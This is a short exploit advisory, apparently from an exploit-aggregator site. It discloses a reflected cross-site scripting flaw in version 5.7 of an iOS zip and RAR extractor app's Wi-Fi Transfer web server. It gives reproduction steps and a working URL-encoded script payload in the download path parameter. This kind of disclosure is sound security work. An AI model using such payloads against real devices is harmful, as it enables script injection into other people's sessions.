Share
## https://sploitus.com/exploit?id=PACKETSTORM:173188
# Exploit Title: Zip & RAR FileExtractor v5.7 - Reflected XSS  
# Vendor Homepage: Penghui Zhao  
# Software Link: https://apps.apple.com/tr/app/zip-rar-file-extractor/id769409043?l=en  
# Date: 2023-06-20  
# Exploit Author: tmrswrr  
# Category : ios app  
# Version: v5.7  
# Tested on: Windows/Linux  
  
  
## Description:  
  
>> Go to Wi-Fi Transfer section in zip rar file extractor app  
>> It will be create link : 192.168.1.104:8080  
>> When open link your browser , write payload, xss payload execute page and see alert button  
  
Url: http://192.168.1.104:8080/download?path=%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E  
Payload: %22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E